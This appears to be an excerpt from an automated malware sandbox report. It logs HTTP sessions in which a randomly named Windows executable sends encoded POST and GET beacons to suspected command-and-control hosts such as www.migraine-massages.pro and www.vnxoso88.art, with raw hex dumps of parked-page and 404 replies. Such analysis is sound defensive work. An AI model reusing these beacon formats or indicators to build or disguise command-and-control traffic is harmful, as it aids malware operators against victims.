                                                                        Data Raw: 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 64 61 74 61 2d 61 64 62 6c 6f 63 6b 6b 65 79 3d 22 4d 46 77 77 44 51 59 4a 4b 6f 5a 49 68 76 63 4e 41 51 45 42 42 51 41 44 53 77 41 77 53 41 4a 42 41 4e 44 72 70 32 6c 7a 37 41 4f 6d 41 44 61 4e 38 74 41 35 30 4c 73 57 63 6a 4c 46 79 51 46 63 62 2f 50 32 54 78 63 35 38 6f 59 4f 65 49 4c 62 33 76 42 77 37 4a 36 66 34 70 61 6d 6b 41 51 56 53 51 75 71 59 73 4b 78 33 59 7a 64 55 48 43 76 62 56 5a 76 46 55 73 43 41 77 45 41 41 51 3d 3d 5f 41 6d 62 6a 76 6a 72 49 78 39 6c 66 66 76 58 4d 75 70 4f 4b 44 6a 57 63 31 59 75 54 47 65 51 64 68 74 36 52 39 5a 66 59 72 45 42 35 70 55 58 51 45 39 4a 4c 4d 64 55 4c 37 2b 4b 57 71 51 44 44 67 62 57 49 34 77 39 36 31 76 34 44 30 46 55 6a 6f 67 47 49 56 41 3d 3d 22 20 6c 61 6e 67 3d 22 65 6e 22 20 73 74 79 6c 65 3d 22 62 61 63 6b 67 72 6f 75 6e 64 3a 20 23 32 42 32 42 32 42 3b 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6d [TRUNCATED]
                                                                        Data Ascii: <!doctype html><html data-adblockkey="MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANDrp2lz7AOmADaN8tA50LsWcjLFyQFcb/P2Txc58oYOeILb3vBw7J6f4pamkAQVSQuqYsKx3YzdUHCvbVZvFUsCAwEAAQ==_AmbjvjrIx9lffvXMupOKDjWc1YuTGeQdht6R9ZfYrEB5pUXQE9JLMdUL7+KWqQDDgbWI4w961v4D0FUjogGIVA==" lang="en" style="background: #2B2B2B;"><head> <meta charset="utf-8"> <meta name="viewport" content="width=device-width, initial-scale=1"> <link rel="icon" href="data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAIAAACQd1PeAAAADElEQVQI12P4//8/AAX+Av7czFnnAAAAAElFTkSuQmCC"
                                                                        Nov 7, 2024 17:58:15.275796890 CET | 607 | IN | Data Raw: 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 70 72 65 63 6f 6e 6e 65 63 74 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 22 20 63 72 6f 73 73 6f 72 69 67 69 6e 3e 0a 3c 2f 68 65 61 64 3e 0a 3c 62
                                                                        Data Ascii: > <link rel="preconnect" href="https://www.google.com" crossorigin></head><body><div id="target" style="opacity: 0"></div><script>window.park = "eyJ1dWlkIjoiNzEyNGQ2MzgtOGM4ZC00NzRhLTllODQtM2JhYmM0MmU5NDQ0IiwicGFnZV90aW1lIjoxNzMwOTk4Nj


                                                                        Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                        6 | 192.168.2.7 | 49846 | 199.59.243.227 | 80 | 3872 | C:\Program Files (x86)\QrvPXARBoEbtUsiaUykbcLKuPmcBzNKBOrZTpVsKIThgQdPcYEPVmeHBZztkAdHanzPhQdtNVWJ\rNgGAKxrFRkFYx.exe
                                                                        Timestamp | Bytes transferred | Direction | Data
                                                                        Nov 7, 2024 17:58:17.205637932 CET | 690 | OUT | POST /ym43/ HTTP/1.1
                                                                        Accept: */*
                                                                        Accept-Encoding: gzip, deflate
                                                                        Accept-Language: en-US,en;q=0.9
                                                                        Content-Type: application/x-www-form-urlencoded
                                                                        Content-Length: 235
                                                                        Cache-Control: max-age=0
                                                                        Connection: close
                                                                        Host: www.migraine-massages.pro
                                                                        Origin: http://www.migraine-massages.pro
                                                                        Referer: http://www.migraine-massages.pro/ym43/
                                                                        User-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/33.0.1726.0 Safari/537.36
                                                                        Data Raw: 37 6a 3d 6f 7a 69 63 77 33 38 73 46 4f 68 55 2b 34 46 4f 67 55 31 75 54 69 38 4a 69 65 62 51 4f 6d 50 39 63 49 5a 65 33 79 55 2b 65 6b 64 35 51 68 6b 69 72 45 2f 35 37 63 51 62 69 36 75 6c 37 51 38 57 71 61 4e 56 49 70 67 51 51 53 7a 68 41 33 72 53 47 43 46 59 52 59 74 59 65 59 35 70 30 65 66 6a 6d 6c 2b 4d 49 62 4e 33 44 75 63 6e 2f 62 35 59 58 39 63 77 65 7a 78 37 52 39 64 6a 44 72 77 70 38 2b 74 31 64 79 52 77 79 58 47 48 75 62 43 52 77 70 61 53 6c 37 4d 67 4e 4d 51 4e 51 2f 69 6f 48 7a 52 4c 50 6a 51 64 62 78 31 4b 78 30 76 32 74 52 64 74 52 72 4b 55 2f 78 4d 70 32 6a 36 63 41 6e 38 47 4c 65 76 68 63 41 62 66 4e 31 36 6a 59 33 59 71 54 56 37 50 6b 43 54 56 65 74 33 43 76 4e 43 6c 62 35 51 3d
                                                                        Data Ascii: 7j=ozicw38sFOhU+4FOgU1uTi8JiebQOmP9cIZe3yU+ekd5QhkirE/57cQbi6ul7Q8WqaNVIpgQQSzhA3rSGCFYRYtYeY5p0efjml+MIbN3Ducn/b5YX9cwezx7R9djDrwp8+t1dyRwyXGHubCRwpaSl7MgNMQNQ/ioHzRLPjQdbx1Kx0v2tRdtRrKU/xMp2j6cAn8GLevhcAbfN16jY3YqTV7PkCTVet3CvNClb5Q=
                                                                        Nov 7, 2024 17:58:17.884562016 CET | 1236 | IN | HTTP/1.1 200 OK
                                                                        date: Thu, 07 Nov 2024 16:58:17 GMT
                                                                        content-type: text/html; charset=utf-8
                                                                        content-length: 1154
                                                                        x-request-id: c071df37-5f77-4a96-aee0-3f424b1718a5
                                                                        cache-control: no-store, max-age=0
                                                                        accept-ch: sec-ch-prefers-color-scheme
                                                                        critical-ch: sec-ch-prefers-color-scheme
                                                                        vary: sec-ch-prefers-color-scheme
                                                                        x-adblock-key: MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANDrp2lz7AOmADaN8tA50LsWcjLFyQFcb/P2Txc58oYOeILb3vBw7J6f4pamkAQVSQuqYsKx3YzdUHCvbVZvFUsCAwEAAQ==_AmbjvjrIx9lffvXMupOKDjWc1YuTGeQdht6R9ZfYrEB5pUXQE9JLMdUL7+KWqQDDgbWI4w961v4D0FUjogGIVA==
                                                                        set-cookie: parking_session=c071df37-5f77-4a96-aee0-3f424b1718a5; expires=Thu, 07 Nov 2024 17:13:17 GMT; path=/
                                                                        connection: close
                                                                        Data Raw: 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 64 61 74 61 2d 61 64 62 6c 6f 63 6b 6b 65 79 3d 22 4d 46 77 77 44 51 59 4a 4b 6f 5a 49 68 76 63 4e 41 51 45 42 42 51 41 44 53 77 41 77 53 41 4a 42 41 4e 44 72 70 32 6c 7a 37 41 4f 6d 41 44 61 4e 38 74 41 35 30 4c 73 57 63 6a 4c 46 79 51 46 63 62 2f 50 32 54 78 63 35 38 6f 59 4f 65 49 4c 62 33 76 42 77 37 4a 36 66 34 70 61 6d 6b 41 51 56 53 51 75 71 59 73 4b 78 33 59 7a 64 55 48 43 76 62 56 5a 76 46 55 73 43 41 77 45 41 41 51 3d 3d 5f 41 6d 62 6a 76 6a 72 49 78 39 6c 66 66 76 58 4d 75 70 4f 4b 44 6a 57 63 31 59 75 54 47 65 51 64 68 74 36 52 39 5a 66 59 72 45 42 35 70 55 58 51 45 39 4a 4c 4d 64 55 4c 37 2b 4b 57 71 51 44 44 67 62 57 49 34 77 39 36 31 76 34 44 30 46 55 6a 6f 67 47 49 56 41 3d 3d 22 20 6c 61 6e 67 3d 22 65 6e 22 20 73 74 79 6c 65 3d 22 62 61 63 6b 67 72 6f 75 6e 64 3a 20 23 32 42 32 42 32 42 3b 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6d [TRUNCATED]
                                                                        Data Ascii: <!doctype html><html data-adblockkey="MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANDrp2lz7AOmADaN8tA50LsWcjLFyQFcb/P2Txc58oYOeILb3vBw7J6f4pamkAQVSQuqYsKx3YzdUHCvbVZvFUsCAwEAAQ==_AmbjvjrIx9lffvXMupOKDjWc1YuTGeQdht6R9ZfYrEB5pUXQE9JLMdUL7+KWqQDDgbWI4w961v4D0FUjogGIVA==" lang="en" style="background: #2B2B2B;"><head> <meta charset="utf-8"> <meta name="viewport" content="width=device-width, initial-scale=1"> <link rel="icon" href="data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAIAAACQd1PeAAAADElEQVQI12P4//8/AAX+Av7czFnnAAAAAElFTkSuQmCC"
                                                                        Nov 7, 2024 17:58:17.884584904 CET | 607 | IN | Data Raw: 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 70 72 65 63 6f 6e 6e 65 63 74 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 22 20 63 72 6f 73 73 6f 72 69 67 69 6e 3e 0a 3c 2f 68 65 61 64 3e 0a 3c 62
                                                                        Data Ascii: > <link rel="preconnect" href="https://www.google.com" crossorigin></head><body><div id="target" style="opacity: 0"></div><script>window.park = "eyJ1dWlkIjoiYzA3MWRmMzctNWY3Ny00YTk2LWFlZTAtM2Y0MjRiMTcxOGE1IiwicGFnZV90aW1lIjoxNzMwOTk4Nj


                                                                        Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                        7 | 192.168.2.7 | 49847 | 199.59.243.227 | 80 | 3872 | C:\Program Files (x86)\QrvPXARBoEbtUsiaUykbcLKuPmcBzNKBOrZTpVsKIThgQdPcYEPVmeHBZztkAdHanzPhQdtNVWJ\rNgGAKxrFRkFYx.exe
                                                                        Timestamp | Bytes transferred | Direction | Data
                                                                        Nov 7, 2024 17:58:19.752448082 CET | 1703 | OUT | POST /ym43/ HTTP/1.1
                                                                        Accept: */*
                                                                        Accept-Encoding: gzip, deflate
                                                                        Accept-Language: en-US,en;q=0.9
                                                                        Content-Type: application/x-www-form-urlencoded
                                                                        Content-Length: 1247
                                                                        Cache-Control: max-age=0
                                                                        Connection: close
                                                                        Host: www.migraine-massages.pro
                                                                        Origin: http://www.migraine-massages.pro
                                                                        Referer: http://www.migraine-massages.pro/ym43/
                                                                        User-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/33.0.1726.0 Safari/537.36
                                                                        Data Raw: 37 6a 3d 6f 7a 69 63 77 33 38 73 46 4f 68 55 2b 34 46 4f 67 55 31 75 54 69 38 4a 69 65 62 51 4f 6d 50 39 63 49 5a 65 33 79 55 2b 65 6c 4a 35 51 58 77 69 72 6c 2f 35 70 4d 51 62 72 61 75 67 37 51 39 55 71 65 70 76 49 70 6b 75 51 51 4c 68 42 52 58 53 58 48 6c 59 65 59 74 59 52 34 35 6f 70 75 65 2b 6d 6c 75 41 49 62 64 33 44 75 63 6e 2f 64 39 59 54 73 63 77 59 7a 78 34 51 39 64 56 4a 4c 77 42 38 34 45 4f 64 79 64 4b 7a 6a 4b 48 76 37 53 52 78 63 75 53 73 37 4d 2b 64 63 51 72 51 2f 76 32 48 33 78 78 50 6a 6c 4b 62 32 78 4b 39 53 4f 51 34 69 35 53 4e 71 2b 37 39 42 6f 4a 33 54 53 70 61 42 41 75 4f 39 50 6e 65 52 43 6d 4d 47 43 4b 54 69 5a 5a 4a 55 6d 39 72 42 72 68 53 4a 66 4d 77 50 47 6a 61 73 37 65 65 57 39 49 42 36 37 72 6e 76 67 33 71 4a 39 70 36 2f 47 38 68 67 4a 46 42 5a 79 79 4b 79 58 59 37 72 5a 69 74 75 4d 6b 53 56 52 6c 50 79 46 49 78 43 6c 4c 36 74 77 4f 71 73 4d 35 4d 6c 37 78 6a 6e 4a 56 72 6a 34 39 63 39 34 73 69 6a 45 6d 64 44 65 62 67 46 53 50 45 49 4c 66 73 53 59 4f 56 42 4f 33 78 6a 66 [TRUNCATED]
                                                                        Data Ascii: 7j=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 [TRUNCATED]
                                                                        Nov 7, 2024 17:58:20.377840042 CET | 1236 | IN | HTTP/1.1 200 OK
                                                                        date: Thu, 07 Nov 2024 16:58:20 GMT
                                                                        content-type: text/html; charset=utf-8
                                                                        content-length: 1154
                                                                        x-request-id: 67a45118-5a19-42e1-a06b-c35908028457
                                                                        cache-control: no-store, max-age=0
                                                                        accept-ch: sec-ch-prefers-color-scheme
                                                                        critical-ch: sec-ch-prefers-color-scheme
                                                                        vary: sec-ch-prefers-color-scheme
                                                                        x-adblock-key: MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANDrp2lz7AOmADaN8tA50LsWcjLFyQFcb/P2Txc58oYOeILb3vBw7J6f4pamkAQVSQuqYsKx3YzdUHCvbVZvFUsCAwEAAQ==_AmbjvjrIx9lffvXMupOKDjWc1YuTGeQdht6R9ZfYrEB5pUXQE9JLMdUL7+KWqQDDgbWI4w961v4D0FUjogGIVA==
                                                                        set-cookie: parking_session=67a45118-5a19-42e1-a06b-c35908028457; expires=Thu, 07 Nov 2024 17:13:20 GMT; path=/
                                                                        connection: close
                                                                        Data Raw: 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 64 61 74 61 2d 61 64 62 6c 6f 63 6b 6b 65 79 3d 22 4d 46 77 77 44 51 59 4a 4b 6f 5a 49 68 76 63 4e 41 51 45 42 42 51 41 44 53 77 41 77 53 41 4a 42 41 4e 44 72 70 32 6c 7a 37 41 4f 6d 41 44 61 4e 38 74 41 35 30 4c 73 57 63 6a 4c 46 79 51 46 63 62 2f 50 32 54 78 63 35 38 6f 59 4f 65 49 4c 62 33 76 42 77 37 4a 36 66 34 70 61 6d 6b 41 51 56 53 51 75 71 59 73 4b 78 33 59 7a 64 55 48 43 76 62 56 5a 76 46 55 73 43 41 77 45 41 41 51 3d 3d 5f 41 6d 62 6a 76 6a 72 49 78 39 6c 66 66 76 58 4d 75 70 4f 4b 44 6a 57 63 31 59 75 54 47 65 51 64 68 74 36 52 39 5a 66 59 72 45 42 35 70 55 58 51 45 39 4a 4c 4d 64 55 4c 37 2b 4b 57 71 51 44 44 67 62 57 49 34 77 39 36 31 76 34 44 30 46 55 6a 6f 67 47 49 56 41 3d 3d 22 20 6c 61 6e 67 3d 22 65 6e 22 20 73 74 79 6c 65 3d 22 62 61 63 6b 67 72 6f 75 6e 64 3a 20 23 32 42 32 42 32 42 3b 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6d [TRUNCATED]
                                                                        Data Ascii: <!doctype html><html data-adblockkey="MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANDrp2lz7AOmADaN8tA50LsWcjLFyQFcb/P2Txc58oYOeILb3vBw7J6f4pamkAQVSQuqYsKx3YzdUHCvbVZvFUsCAwEAAQ==_AmbjvjrIx9lffvXMupOKDjWc1YuTGeQdht6R9ZfYrEB5pUXQE9JLMdUL7+KWqQDDgbWI4w961v4D0FUjogGIVA==" lang="en" style="background: #2B2B2B;"><head> <meta charset="utf-8"> <meta name="viewport" content="width=device-width, initial-scale=1"> <link rel="icon" href="data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAIAAACQd1PeAAAADElEQVQI12P4//8/AAX+Av7czFnnAAAAAElFTkSuQmCC"
                                                                        Nov 7, 2024 17:58:20.377867937 CET | 607 | IN | Data Raw: 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 70 72 65 63 6f 6e 6e 65 63 74 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 22 20 63 72 6f 73 73 6f 72 69 67 69 6e 3e 0a 3c 2f 68 65 61 64 3e 0a 3c 62
                                                                        Data Ascii: > <link rel="preconnect" href="https://www.google.com" crossorigin></head><body><div id="target" style="opacity: 0"></div><script>window.park = "eyJ1dWlkIjoiNjdhNDUxMTgtNWExOS00MmUxLWEwNmItYzM1OTA4MDI4NDU3IiwicGFnZV90aW1lIjoxNzMwOTk4Nz


                                                                        Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                        8 | 192.168.2.7 | 49848 | 199.59.243.227 | 80 | 3872 | C:\Program Files (x86)\QrvPXARBoEbtUsiaUykbcLKuPmcBzNKBOrZTpVsKIThgQdPcYEPVmeHBZztkAdHanzPhQdtNVWJ\rNgGAKxrFRkFYx.exe
                                                                        Timestamp | Bytes transferred | Direction | Data
                                                                        Nov 7, 2024 17:58:22.296019077 CET | 398 | OUT | GET /ym43/?UvgPX=o0HdzhbpI6gx&7j=lxK8zDwlVeZA0KFinmdrczEoh9foX2bLCYsrgBVnd1hBfzxarUrY7JsYsrWqjgtO371UEdIqaCaBOhfuQGtRQrtCTIFT6dG/tSbtJaoqKbhoy9A6auA9JhwvUMdjGZYE6oZ+fUFh6Re5 HTTP/1.1
                                                                        Accept: */*
                                                                        Accept-Language: en-US,en;q=0.9
                                                                        Connection: close
                                                                        Host: www.migraine-massages.pro
                                                                        User-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/33.0.1726.0 Safari/537.36
                                                                        Nov 7, 2024 17:58:22.913733006 CET | 1236 | IN | HTTP/1.1 200 OK
                                                                        date: Thu, 07 Nov 2024 16:58:22 GMT
                                                                        content-type: text/html; charset=utf-8
                                                                        content-length: 1534
                                                                        x-request-id: 3edce0ac-5d27-4c41-9e29-645b76387450
                                                                        cache-control: no-store, max-age=0
                                                                        accept-ch: sec-ch-prefers-color-scheme
                                                                        critical-ch: sec-ch-prefers-color-scheme
                                                                        vary: sec-ch-prefers-color-scheme
                                                                        x-adblock-key: MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANDrp2lz7AOmADaN8tA50LsWcjLFyQFcb/P2Txc58oYOeILb3vBw7J6f4pamkAQVSQuqYsKx3YzdUHCvbVZvFUsCAwEAAQ==_XX3Wuet/YHW07LZrI2ABfV22QUkhVCHs0ezi8QDEmbpfeTSpa5Suh1bzJOp4a15opnxMHLb71LZ8a+rP+BAYXQ==
                                                                        set-cookie: parking_session=3edce0ac-5d27-4c41-9e29-645b76387450; expires=Thu, 07 Nov 2024 17:13:22 GMT; path=/
                                                                        connection: close
                                                                        Data Raw: 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 64 61 74 61 2d 61 64 62 6c 6f 63 6b 6b 65 79 3d 22 4d 46 77 77 44 51 59 4a 4b 6f 5a 49 68 76 63 4e 41 51 45 42 42 51 41 44 53 77 41 77 53 41 4a 42 41 4e 44 72 70 32 6c 7a 37 41 4f 6d 41 44 61 4e 38 74 41 35 30 4c 73 57 63 6a 4c 46 79 51 46 63 62 2f 50 32 54 78 63 35 38 6f 59 4f 65 49 4c 62 33 76 42 77 37 4a 36 66 34 70 61 6d 6b 41 51 56 53 51 75 71 59 73 4b 78 33 59 7a 64 55 48 43 76 62 56 5a 76 46 55 73 43 41 77 45 41 41 51 3d 3d 5f 58 58 33 57 75 65 74 2f 59 48 57 30 37 4c 5a 72 49 32 41 42 66 56 32 32 51 55 6b 68 56 43 48 73 30 65 7a 69 38 51 44 45 6d 62 70 66 65 54 53 70 61 35 53 75 68 31 62 7a 4a 4f 70 34 61 31 35 6f 70 6e 78 4d 48 4c 62 37 31 4c 5a 38 61 2b 72 50 2b 42 41 59 58 51 3d 3d 22 20 6c 61 6e 67 3d 22 65 6e 22 20 73 74 79 6c 65 3d 22 62 61 63 6b 67 72 6f 75 6e 64 3a 20 23 32 42 32 42 32 42 3b 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6d [TRUNCATED]
                                                                        Data Ascii: <!doctype html><html data-adblockkey="MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANDrp2lz7AOmADaN8tA50LsWcjLFyQFcb/P2Txc58oYOeILb3vBw7J6f4pamkAQVSQuqYsKx3YzdUHCvbVZvFUsCAwEAAQ==_XX3Wuet/YHW07LZrI2ABfV22QUkhVCHs0ezi8QDEmbpfeTSpa5Suh1bzJOp4a15opnxMHLb71LZ8a+rP+BAYXQ==" lang="en" style="background: #2B2B2B;"><head> <meta charset="utf-8"> <meta name="viewport" content="width=device-width, initial-scale=1"> <link rel="icon" href="data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAIAAACQd1PeAAAADElEQVQI12P4//8/AAX+Av7czFnnAAAAAElFTkSuQmCC"
                                                                        Nov 7, 2024 17:58:22.913758993 CET | 987 | IN | Data Raw: 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 70 72 65 63 6f 6e 6e 65 63 74 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 22 20 63 72 6f 73 73 6f 72 69 67 69 6e 3e 0a 3c 2f 68 65 61 64 3e 0a 3c 62
                                                                        Data Ascii: > <link rel="preconnect" href="https://www.google.com" crossorigin></head><body><div id="target" style="opacity: 0"></div><script>window.park = "eyJ1dWlkIjoiM2VkY2UwYWMtNWQyNy00YzQxLTllMjktNjQ1Yjc2Mzg3NDUwIiwicGFnZV90aW1lIjoxNzMwOTk4Nz


                                                                        Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                        9 | 192.168.2.7 | 49850 | 66.29.146.14 | 80 | 3872 | C:\Program Files (x86)\QrvPXARBoEbtUsiaUykbcLKuPmcBzNKBOrZTpVsKIThgQdPcYEPVmeHBZztkAdHanzPhQdtNVWJ\rNgGAKxrFRkFYx.exe
                                                                        Timestamp | Bytes transferred | Direction | Data
                                                                        Nov 7, 2024 17:58:28.029933929 CET | 643 | OUT | POST /d26j/ HTTP/1.1
                                                                        Accept: */*
                                                                        Accept-Encoding: gzip, deflate
                                                                        Accept-Language: en-US,en;q=0.9
                                                                        Content-Type: application/x-www-form-urlencoded
                                                                        Content-Length: 215
                                                                        Cache-Control: max-age=0
                                                                        Connection: close
                                                                        Host: www.vnxoso88.art
                                                                        Origin: http://www.vnxoso88.art
                                                                        Referer: http://www.vnxoso88.art/d26j/
                                                                        User-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/33.0.1726.0 Safari/537.36
                                                                        Data Raw: 37 6a 3d 2f 52 31 7a 73 2f 69 4b 6d 66 66 2b 47 53 2b 78 4f 46 4f 56 32 44 64 46 58 6c 41 39 30 6a 73 69 55 54 4e 56 55 6a 62 57 77 36 6c 33 42 66 55 50 4d 75 54 56 66 62 6d 77 48 58 59 2f 32 62 71 45 5a 68 59 56 4b 2f 4e 47 6f 51 34 68 4a 6b 64 79 39 64 74 6b 32 57 31 32 4d 78 5a 32 49 33 39 4f 2f 37 45 70 4e 6a 68 63 57 68 52 55 59 70 68 6d 58 5a 52 33 45 68 64 73 45 6e 72 6d 63 6e 55 55 61 38 6b 6a 67 76 71 50 73 52 74 4f 62 52 61 53 39 72 42 48 36 55 37 77 6c 68 45 54 74 57 71 4c 32 75 46 6f 52 55 79 52 55 71 30 4b 65 37 45 52 48 5a 59 58 77 6a 4f 52 74 42 39 35 79 44 58 44 69 73 71 5a 35 6d 6b 33 6c 58 38 61 69 6b 50 4b 30 77 3d 3d
                                                                        Data Ascii: 7j=/R1zs/iKmff+GS+xOFOV2DdFXlA90jsiUTNVUjbWw6l3BfUPMuTVfbmwHXY/2bqEZhYVK/NGoQ4hJkdy9dtk2W12MxZ2I39O/7EpNjhcWhRUYphmXZR3EhdsEnrmcnUUa8kjgvqPsRtObRaS9rBH6U7wlhETtWqL2uFoRUyRUq0Ke7ERHZYXwjORtB95yDXDisqZ5mk3lX8aikPK0w==
                                                                        Nov 7, 2024 17:58:28.689205885 CET | 1236 | IN | HTTP/1.1 404 Not Found
                                                                        keep-alive: timeout=5, max=100
                                                                        content-type: text/html
                                                                        transfer-encoding: chunked
                                                                        content-encoding: gzip
                                                                        vary: Accept-Encoding
                                                                        date: Thu, 07 Nov 2024 16:58:28 GMT
                                                                        server: LiteSpeed
                                                                        x-turbo-charged-by: LiteSpeed
                                                                        connection: close
                                                                        Data Raw: 31 33 34 43 0d 0a 1f 8b 08 00 00 00 00 00 00 03 cc 5a e9 92 e2 4a 76 fe 7f 9f 02 97 c3 f6 4c a8 ab b5 02 a2 a6 aa 67 b4 21 09 90 90 04 02 84 c3 71 43 bb 84 56 b4 c3 84 1f c8 af e1 27 73 8a aa ea a2 e8 aa db 3d 0e ff 70 f6 8f 42 b9 9c 3c cb 77 ce c9 ce 93 bf fd f6 db e3 3f b1 4b 66 6d 28 dc 20 a8 92 f8 db 6f 8f cf 7f 06 a0 3d 06 ae e9 7c fb ed f2 33 71 2b 13 cc a8 f2 7b f7 58 87 cd d3 1d 93 a5 95 9b 56 f7 d5 29 77 ef 06 f6 f3 d7 d3 5d e5 76 15 dc 93 f8 cb c0 0e cc a2 74 ab a7 ba f2 ee c9 bb 4f e9 98 76 e0 de f7 eb 8b 2c be 22 94 66 f7 76 3f f4 e9 42 a5 30 fd c4 fc 47 56 70 5d 1e 16 6e 79 b5 04 79 47 3d 35 13 f7 e9 ae 09 dd 36 cf 8a ea 6a 5a 1b 3a 55 f0 e4 b8 4d 68 bb f7 97 8f 2f 83 30 0d ab d0 8c ef 4b db 8c dd 27 f4 eb 77 52 55 58 c5 ee 37 02 21 06 72 56 0d a6 59 9d 3a 8f f0 73 e7 b3 2a cb ea 14 bb 83 5e 6f 2f ea b2 cb f2 85 8f 5e d5 56 e6 9c 06 7f bf 4c ed 3f fb e6 01 ed dc 7b 66 12 c6 a7 87 01 55 80 6d bf 0c 04 37 6e dc 2a b4 cd 2f 83 d2 4c cb fb d2 2d 42 ef 2f 3f 2e 2b c3 b3 fb 30 40 89 bc 7b 3f [TRUNCATED]
                                                                        Data Ascii: 134CZJvLg!qCV's=pB<w?Kfm( o=|3q+{XV)w]vtOv,"fv?B0GVp]nyyG=56jZ:UMh/0K'wRUX7!rVY:s*^o/^VL?{fUm7n*/L-B/?.+0@{?{T`+1J`,(?{~61y??1?LuwK,D*yl]XqfG}g}z@Kf]e7{._",-0A_\WXqo_Pl!.\c=$?3gE/-"!=z`@]Wh-5@yFgj]IyPN>!Io<?=n*Ko:;j}vV Eoqhd[\=^f&32Q#b2zcQ>2/ol?yqXV>uY]!!_u&-)o>2bi3}`dmyG;].Q>P|}m_QmV8HrT~I*@W KYxSz125?VPtYCzug|J
                                                                        Nov 7, 2024 17:58:28.689233065 CET | 1236 | IN | Data Raw: a0 04 fe 66 86 37 7e fe 96 b8 4e 68 0e fe 94 80 40 fa 62 98 f1 88 cc bb 3f df 6c 73 8b da 9b e1 5e 79 79 56 5e 32 d4 c3 a0 70 63 10 eb 9a 1b 07 ec e7 f4 11 0b f8 4f fb 30 08 42 c7 71 d3 37 96 fa d1 be 5d e5 a7 0b b2 9f fd fa fd bc 37 f6 fb 15 b7
                                                                        Data Ascii: f7~Nh@b?ls^yyV^2pcO0Bq7]7}E(CI?8T^4=u/"]G}~=q<^z?4GLRb ,d^s"g^a0oeZero>z9
                                                                        Nov 7, 2024 17:58:28.689248085 CET | 424 | IN | Data Raw: e1 b2 c4 27 0b 58 34 da 70 d9 69 82 ef 72 73 3b b1 24 71 62 db 82 c6 38 9d ee 1a 66 3a cd d5 99 44 eb ac 38 ed 5a d4 0e 66 21 4d 65 49 74 c6 3b 02 8f a1 b4 de f2 c9 36 88 d4 12 31 47 c6 d8 10 36 ee 78 8c 25 68 b5 8f 75 9a 0b e6 e2 24 1a a5 f5 82
                                                                        Data Ascii: 'X4pirs;$qb8f:D8Zf!MeIt;61G6x%hu$#|NpTqf76[J9^sNdK[(t&A\'a GXfSfQ*sam.!4_&;pBM=:rRy%9\[(n.ZAX-
                                                                        Nov 7, 2024 17:58:28.689490080 CET | 1236 | IN | Data Raw: a9 9f 63 66 29 9d c2 c9 1e 5a ec 40 b6 59 0d c3 63 21 12 6a 5a cb b1 47 66 1b ce 9a 93 d4 70 38 52 d5 39 b2 90 8b f5 01 ab c2 ad 67 4f d3 00 09 14 31 37 b8 0d 7f 48 68 ca c5 ac c9 50 c7 5b a9 0b b3 90 2b b4 04 4b eb c0 21 55 8d a1 48 b1 5d 6b d4
                                                                        Data Ascii: cf)Z@Yc!jZGfp8R9gO17HhP[+K!UH]k]*F9I?!S*@kpF38'!6I;ywV4-*"g)W3*i$v#TsT2r,.,$ .P,-i@DU\-
